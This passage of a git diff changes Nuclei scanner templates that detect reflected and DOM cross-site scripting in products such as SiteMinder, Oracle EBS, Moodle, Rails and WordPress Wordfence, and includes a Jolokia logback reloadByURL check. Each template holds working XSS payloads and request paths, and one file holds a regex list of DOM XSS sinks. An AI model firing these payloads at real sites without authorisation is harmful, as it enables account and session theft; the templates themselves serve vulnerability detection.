"{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body words: - "http:\\/\\/nonexistent:31337\\/logback.xml" - "reloadByURL" - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header \ No newline at end of file + condition: and \ No newline at end of file diff --git a/poc/xss/DOM-XSS-SiteMinder.yaml b/poc/xss/DOM-XSS-SiteMinder.yaml index 2868f2cd46..5aac16e873 100644 --- a/poc/xss/DOM-XSS-SiteMinder.yaml +++ b/poc/xss/DOM-XSS-SiteMinder.yaml @@ -1,5 +1,4 @@ id: siteminder-dom-based-xss - info: name: SiteMinder DOM BASED XSS author: Clark @@ -7,23 +6,19 @@ info: description: SiteMinder DOM Based XSS. tags: dom,xss reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html - requests: - method: GET path: - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - 'confirm(document.domain)' - - type: word words: - 'text/html' diff --git a/poc/xss/Oracle-OAM-XSS.yaml b/poc/xss/Oracle-OAM-XSS.yaml index f161e756dd..904ec6970b 100644 --- a/poc/xss/Oracle-OAM-XSS.yaml +++ b/poc/xss/Oracle-OAM-XSS.yaml @@ -1,12 +1,10 @@ id: Oracle-OAM-XSS - info: name: Oracle OAM - XSS author: dk4trin severity: medium description: Cross-site scripting (XSS) on Oracle OAM tags: xss,oracle - requests: - method: GET path: @@ -16,12 +14,10 @@ requests: - type: status status: - 200 - - type: word words: - "alert(1)//>*/;top.alert(2)//" part: body - - type: word words: - "text/html" diff --git a/poc/xss/accessibility-helper-xss-19.yaml b/poc/xss/accessibility-helper-xss-19.yaml index 4d6c81f13e..00527d34da 100644 --- a/poc/xss/accessibility-helper-xss-19.yaml +++ b/poc/xss/accessibility-helper-xss-19.yaml @@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: medium description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 + reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 tags: xss,wordpress,wp-plugin,wp requests: - method: GET diff --git a/poc/xss/basic-xss-prober-696.yaml b/poc/xss/basic-xss-prober-696.yaml index e1a7c5b60a..6ad90e4b83 100644 --- a/poc/xss/basic-xss-prober-696.yaml +++ b/poc/xss/basic-xss-prober-696.yaml @@ -2,9 +2,9 @@ id: basic-xss-prober info: name: Basic XSS Prober - author: nadino,geeknik + author: nadino & geeknik severity: low - tags: xss,generic + tags: xss # Basic XSS prober # Manual testing needed for exploitation @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/xss/chamilo-lms-xss.yaml b/poc/xss/chamilo-lms-xss.yaml index 197aece45e..ad8b95d717 100644 --- a/poc/xss/chamilo-lms-xss.yaml +++ b/poc/xss/chamilo-lms-xss.yaml @@ -1,8 +1,8 @@ -id: chamilo-lms-xss-1 +id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/poc/xss/coldfusion-debug-xss.yaml b/poc/xss/coldfusion-debug-xss.yaml index aedbabe04b..8031a8dd4a 100644 --- a/poc/xss/coldfusion-debug-xss.yaml +++ b/poc/xss/coldfusion-debug-xss.yaml @@ -4,7 +4,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: - method: GET diff --git a/poc/xss/concrete-xss-1174.yaml b/poc/xss/concrete-xss-1174.yaml index b49633bc55..57ec254a12 100644 --- a/poc/xss/concrete-xss-1174.yaml +++ b/poc/xss/concrete-xss-1174.yaml @@ -1,4 +1,5 @@ id: concrete-xss + info: author: shifacyclewla,hackergautam description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. @@ -9,22 +10,26 @@ info: - https://hackerone.com/reports/643442 - https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 + requests: - method: GET path: - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>' + matchers-condition: and matchers: - type: word part: body words: - '</iframe><svg/onload=alert("{{randstr}}")>' + - type: word part: header words: - "text/html" - "CONCRETE5" condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/xss/discourse-xss-7013.yaml b/poc/xss/discourse-xss-7013.yaml index abdb65e6c0..1ba1c7ef63 100644 --- a/poc/xss/discourse-xss-7013.yaml +++ b/poc/xss/discourse-xss-7013.yaml @@ -1,10 +1,12 @@ id: discourse-xss + info: name: Discourse CMS - XSS author: madrobot severity: medium description: Cross-site scripting (XSS) on Discourse CMS tags: xss,discourse + requests: - method: GET path: @@ -14,11 +16,13 @@ requests: - type: status status: - 200 + - type: word words: - "<svg/onload=alert(xss)>" part: body + - type: word words: - "text/html" - part: header + part: header \ No newline at end of file diff --git a/poc/xss/dom-xss-7080.yaml b/poc/xss/dom-xss-7080.yaml index 793e1a648a..ed65126d4c 100644 --- a/poc/xss/dom-xss-7080.yaml +++ b/poc/xss/dom-xss-7080.yaml @@ -1,4 +1,5 @@ id: dom-xss + info: name: DOM XSS Sources & Sinks reference: Inspired by https://portswigger.net/blog/introducing-dom-invader @@ -6,6 +7,7 @@ info: author: geeknik severity: info tags: xss,file + file: - extensions: - js @@ -15,6 +17,7 @@ file: - cs - rb - py + extractors: - type: regex name: sink diff --git a/poc/xss/dom-xss.yaml b/poc/xss/dom-xss.yaml index 09394df88e..726c653298 100644 --- a/poc/xss/dom-xss.yaml +++ b/poc/xss/dom-xss.yaml @@ -1,46 +1,45 @@ id: dom-xss info: - name: DOM Cross Site Scripting - author: theamanrawat - severity: medium - description: | - Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. - impact: | - Allows attackers to execute malicious scripts in the victim's browser. - remediation: | - Sanitize and validate user input to prevent script injection. - tags: xss,dom,dast,headless -variables: - num: "{{rand_int(10000, 99999)}}" -headless: - - steps: - - action: navigate - args: - url: "{{BaseURL}}" + name: DOM XSS Sources & Sinks + reference: https://portswigger.net/blog/introducing-dom-invader + author: geeknik + severity: info + tags: dom,xss - - action: waitload - payloads: - reflection: - - "'\"><h1>{{num}}</h1>" +file: + - extensions: + - js + - ts + - html + - php + - cs + - rb + - py - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{reflection}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word + extractors: + - type: regex + name: sink part: body - words: - - "<h1>{{num}}</h1>" - - - type: word - part: header - words: - - "text/html" -# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + regex: + - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' + - 'fetch(\.body)?' + - 'history(\.pushState|\.replaceState)' + - '(session|local)Storage(\.setItem(\.name|\.value))' + - 'anchor(\.href|\.target)' + - 'button(\.formaction|\.value)' + - 'set(Timeout|Interval|Immediate)' + - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' + - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' + - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' + - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' + - 'iframe(\.srcdoc|\.src)' + - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex + name: source + part: body + regex: + - 'location(\.href|\.hash|\.search|\.pathname)?' + - 'window\.name' + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' diff --git a/poc/xss/java-melody-xss-8225.yaml b/poc/xss/java-melody-xss-8225.yaml index 53c48c29ef..3899625c59 100644 --- a/poc/xss/java-melody-xss-8225.yaml +++ b/poc/xss/java-melody-xss-8225.yaml @@ -1,6 +1,7 @@ id: java-melody-xss + info: - name: JavaMelody Monitoring - Cross-Site Scripting + name: JavaMelody Monitoring XSS author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. @@ -8,19 +9,23 @@ info: - https://github.com/Hurdano/JavaMelody-XSS - https://github.com/javamelody/javamelody/pull/555 tags: xss,javamelody + requests: - method: GET path: - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '</script><script>alert(document.domain)</script>' + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/xss/microweber-xss-8865.yaml b/poc/xss/microweber-xss-8865.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/xss/microweber-xss-8865.yaml +++ b/poc/xss/microweber-xss-8865.yaml @@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/xss/mida-eframework-xss.yaml b/poc/xss/mida-eframework-xss.yaml index 743d669bdd..3516f07456 100644 --- a/poc/xss/mida-eframework-xss.yaml +++ b/poc/xss/mida-eframework-xss.yaml @@ -1,22 +1,18 @@ id: mida-eframework-xss - info: name: Mida eFramework - Cross Site Scripting author: pikpikcu severity: medium tags: mida,xss - requests: - raw: - | POST /MUP/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/MUP UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E - matchers-condition: and matchers: - type: status @@ -24,4 +20,4 @@ requests: - 200 - type: word words: - - '"><script>javascript:alert(document.cookie)</script>' \ No newline at end of file + - '"><script>javascript:alert(document.cookie)</script>' diff --git a/poc/xss/moodle-filter-jmol-xss-8944.yaml b/poc/xss/moodle-filter-jmol-xss-8944.yaml index 3de97cd97f..e5153a78ec 100644 --- a/poc/xss/moodle-filter-jmol-xss-8944.yaml +++ b/poc/xss/moodle-filter-jmol-xss-8944.yaml @@ -1,20 +1,30 @@ id: moodle-filter-jmol-xss + info: name: Moodle filter_jmol - XSS author: madrobot severity: medium description: Cross-site scripting on Moodle. + reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss + requests: - method: GET path: - - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" + - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - '\"};alert(1337);//' + - "<script>alert('XSS')</script>" part: body + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/poc/xss/nginx-module-vts-xss-9108.yaml b/poc/xss/nginx-module-vts-xss-9108.yaml index 61c9ee43e6..4057382928 100644 --- a/poc/xss/nginx-module-vts-xss-9108.yaml +++ b/poc/xss/nginx-module-vts-xss-9108.yaml @@ -1,41 +1,18 @@ id: nginx-module-vts-xss - info: - name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting - author: madrobot,j4vaovo - severity: high - description: Nginx Virtual Host Traffic Status Module contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/vozlt/nginx-module-vts - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 2 - tags: nginx,xss,status - -http: - - raw: - - | - GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - + name: Nginx virtual host traffic status module XSS + author: madrobot + severity: medium +requests: + - method: GET + path: + - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_2 == 200" - - "contains(header_2, 'text/html')" - - "contains(tolower(body_2), '<script>alert(7331)</script>')" - condition: and - - - type: dsl - dsl: - - "!contains(tolower(body_1), '<script>alert(1337)</script>')" - condition: and - -# digest: 4a0a00473045022100bef45d36680d708495ed8789f663d812bf77ddc8302ba5453b03064d854396940220096f5be895895b9b295c6e4a0a68259b2606c6b857da24f5b78ecfe880647b7f:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 + - type: word + words: + - "<script>alert(31337)</script>" + part: body diff --git a/poc/xss/oracle-ebs-xss-9375.yaml b/poc/xss/oracle-ebs-xss-9375.yaml index 8c5ff6abb9..b684437823 100644 --- a/poc/xss/oracle-ebs-xss-9375.yaml +++ b/poc/xss/oracle-ebs-xss-9375.yaml @@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS - Cross-Site Scripting + name: Oracle EBS XSS author: dhiyaneshDk severity: medium + tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "<svg/onload=alert('{{randstr}}')>" part: body + - type: status status: - 200 diff --git a/poc/xss/oracle-siebel-xss.yaml b/poc/xss/oracle-siebel-xss.yaml index 2de4a62dca..8185fb2460 100644 --- a/poc/xss/oracle-siebel-xss.yaml +++ b/poc/xss/oracle-siebel-xss.yaml @@ -1,19 +1,11 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting + name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK - severity: high - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: - - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - - https://exploit-db.com/exploits/47762 - - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel + severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + tags: xss,oracle requests: - method: GET path: @@ -30,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/xss/php-timeclock-xss-9553.yaml b/poc/xss/php-timeclock-xss-9553.yaml index 4b06f97417..55686517b4 100644 --- a/poc/xss/php-timeclock-xss-9553.yaml +++ b/poc/xss/php-timeclock-xss-9553.yaml @@ -1,16 +1,18 @@ id: php-timeclock-xss + info: name: PHP Timeclock 1.04 XSS author: pikpikcu severity: medium description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities - reference: - - https://www.exploit-db.com/exploits/49853 + reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock + requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" + matchers-condition: and matchers: - type: status @@ -22,6 +24,7 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and + - type: word words: - "text/html" diff --git a/poc/xss/qcubed-xss.yaml b/poc/xss/qcubed-xss.yaml index cae77f9cf8..c3cee1042e 100644 --- a/poc/xss/qcubed-xss.yaml +++ b/poc/xss/qcubed-xss.yaml @@ -1,29 +1,26 @@ id: qcubed-xss - info: name: Qcubed Reflected XSS author: pikpikcu severity: medium + description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. reference: https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed - requests: - method: GET path: - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '</script><script>alert(document.domain)</script>' part: body - - type: status status: - 200 - - type: word part: header words: diff --git a/poc/xss/rails6-xss-9800.yaml b/poc/xss/rails6-xss-9800.yaml index 184c779cfa..7991dd37b2 100644 --- a/poc/xss/rails6-xss-9800.yaml +++ b/poc/xss/rails6-xss-9800.yaml @@ -1,20 +1,22 @@ id: rails6-xss -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); -# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf + + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" + matchers-condition: and matchers: - type: word diff --git a/poc/xss/rockmongo-xss.yaml b/poc/xss/rockmongo-xss.yaml index d23d822656..e7d666e455 100644 --- a/poc/xss/rockmongo-xss.yaml +++ b/poc/xss/rockmongo-xss.yaml @@ -1,12 +1,12 @@ id: rockmongo-xss - info: name: RockMongo V1.1.8 XSS author: pikpikcu severity: medium - reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html + description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. + reference: + - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss - requests: - method: POST path: @@ -14,20 +14,16 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3" - matchers-condition: and matchers: - - type: word words: - '"><script>alert(document.domain)</script>' part: body - - type: status status: - 200 - - type: word words: - 'Content-Type: text/html' - part: header \ No newline at end of file + part: header diff --git a/poc/xss/sick-beard-xss-10234.yaml b/poc/xss/sick-beard-xss-10234.yaml index 7c77563074..077ac871aa 100644 --- a/poc/xss/sick-beard-xss-10234.yaml +++ b/poc/xss/sick-beard-xss-10234.yaml @@ -1,14 +1,14 @@ id: sick-beard-xss - -# Vendor Homepage: https://sickbeard.com/ -# Software Link: https://github.com/midgetspy/Sick-Beard -# shodan dork: sickbeard - info: name: Sick Beard XSS author: pikpikcu severity: medium - + reference: + - https://sickbeard.com/ # vendor homepage + - https://github.com/midgetspy/Sick-Beard # software link + metadata: + shodan-query: sickbeard + tags: xss requests: - method: GET path: @@ -21,4 +21,8 @@ requests: - type: word words: - <svg/onload=alert(document.domain)> - part: body \ No newline at end of file + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/xss/sick-beard-xss.yaml b/poc/xss/sick-beard-xss.yaml index 9ff750dba9..99281db45d 100644 --- a/poc/xss/sick-beard-xss.yaml +++ b/poc/xss/sick-beard-xss.yaml @@ -1,14 +1,15 @@ id: sick-beard-xss + info: name: Sick Beard XSS author: pikpikcu severity: medium tags: xss - reference: - - https://sickbeard.com/ # vendor homepage - - https://github.com/midgetspy/Sick-Beard # software link - metadata: - shodan-query: sickbeard + +# Vendor Homepage: https://sickbeard.com/ +# Software Link: https://github.com/midgetspy/Sick-Beard +# shodan dork: sickbeard + requests: - method: GET path: @@ -25,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header + part: header \ No newline at end of file diff --git a/poc/xss/tikiwiki-reflected-xss.yaml b/poc/xss/tikiwiki-reflected-xss.yaml index 1fb2ed3601..6283ecd6fd 100644 --- a/poc/xss/tikiwiki-reflected-xss.yaml +++ b/poc/xss/tikiwiki-reflected-xss.yaml @@ -1,14 +1,17 @@ id: tikiwiki-reflected-xss + info: name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting author: madrobot severity: medium - tags: xss + tags: xss,tikiwiki + requests: - method: GET path: - "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" - "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" + matchers-condition: and matchers: - type: status diff --git a/poc/xss/turbocrm-xss-10851.yaml b/poc/xss/turbocrm-xss-10851.yaml index 3967f32aff..8b56f76f93 100644 --- a/poc/xss/turbocrm-xss-10851.yaml +++ b/poc/xss/turbocrm-xss-10851.yaml @@ -1,26 +1,40 @@ id: turbocrm-xss + info: - name: TurboCRM XSS + name: TurboCRM - Cross-Site Scripting author: pikpikcu - severity: medium - description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. + severity: high + description: TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application. reference: - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: xss,turbocrm -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + matchers-condition: and matchers: + - type: word words: - '"><script>alert(document.domain)</script>' part: body + - type: word part: header words: - "text/html" + - type: status status: - 200 + +# Enhanced by mp on 2022/09/23 diff --git a/poc/xss/wems-manager-xss.yaml b/poc/xss/wems-manager-xss.yaml index b3f7b4ace4..e3e8a064f3 100644 --- a/poc/xss/wems-manager-xss.yaml +++ b/poc/xss/wems-manager-xss.yaml @@ -1,14 +1,11 @@ id: wems-manager-xss - info: name: WEMS Enterprise Manager XSS author: pikpikcu severity: medium tags: xss - reference: | - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - requests: - method: GET path: @@ -25,4 +22,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/xss/wordpress-wordfence-xss-11362.yaml b/poc/xss/wordpress-wordfence-xss-11362.yaml index 5e9faea1da..5bae09492e 100644 --- a/poc/xss/wordpress-wordfence-xss-11362.yaml +++ b/poc/xss/wordpress-wordfence-xss-11362.yaml @@ -1,37 +1,23 @@ id: wordpress-wordfence-xss - info: - name: WordPress Wordfence 7.4.6 - Cross0Site Scripting + name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 tags: wordpress,wp-plugin,xss,wordfence - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" - matchers-condition: and matchers: - type: word words: - "'>\"<svg/onload=confirm('test')>" part: body - - type: word words: - "text/html" part: header - - type: status status: - 200 - -# digest: 4b0a00483046022100815f67bcdfe2984d98c0813beb5910e2cc89f870bb3bbd77541709c3b946b81d022100a2dbf03c4062d763655eb094266a2faa921751d5b6a85ddc160e4731ee1731a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/xss/wordpress-zebra-form-xss-11379.yaml b/poc/xss/wordpress-zebra-form-xss-11379.yaml index a36ec88196..bd81293cdb 100644 --- a/poc/xss/wordpress-zebra-form-xss-11379.yaml +++ b/poc/xss/wordpress-zebra-form-xss-11379.yaml @@ -1,27 +1,22 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: 